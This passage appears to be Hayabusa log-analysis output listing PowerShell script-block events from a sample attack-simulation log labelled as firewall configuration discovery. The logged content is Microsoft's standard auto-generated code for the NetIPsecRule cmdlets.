[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, 
[Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try 
{",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) 
$__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') 
-and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue)",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] 
